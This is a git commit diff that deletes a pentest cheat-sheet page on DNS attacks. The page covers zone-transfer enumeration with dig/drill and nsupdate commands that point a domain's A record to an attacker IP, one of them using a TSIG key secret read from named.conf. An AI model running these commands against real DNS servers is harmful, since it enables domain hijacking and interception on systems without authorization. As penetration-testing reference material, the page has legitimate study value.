clean up and rewrite
This commit is contained in:
whackx
parent
0f1b59e80f
commit
3f066cb663
|
|
@ -1,43 +0,0 @@
|
||||||
# DNS
|
|
||||||
|
|
||||||
## Subdomain Enumeration
|
|
||||||
|
|
||||||
* Get all the info via
|
|
||||||
```sh
|
|
||||||
dig @$TARGET_DNS $DOMAIN axfr
|
|
||||||
drill @$TARGET_DNS $DOMAIN axfr
|
|
||||||
```
|
|
||||||
|
|
||||||
There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
|
|
||||||
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
|
|
||||||
|
|
||||||
## Join a Domain
|
|
||||||
|
|
||||||
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
|
|
||||||
```sh
|
|
||||||
nsupdate
|
|
||||||
server <DNS-IP>
|
|
||||||
update delete <sub.domain.com>
|
|
||||||
update add <sub.domain.com> 1234 A $ATTACKER_IP
|
|
||||||
send
|
|
||||||
quit
|
|
||||||
```
|
|
||||||
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
|
|
||||||
|
|
||||||
### Found Secrets for Keys
|
|
||||||
|
|
||||||
Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
|
|
||||||
```sh
|
|
||||||
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
|
|
||||||
Creating key...
|
|
||||||
namefromtext
|
|
||||||
keycreate
|
|
||||||
|
|
||||||
server <domain>
|
|
||||||
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
|
|
||||||
send
|
|
||||||
```
|
|
||||||
|
|
||||||
*Hint:* Copy the lines, every space counts as it has to be exactly like in the example
|
|
||||||
|
|
||||||
|
|
||||||
Loading…
Reference in New Issue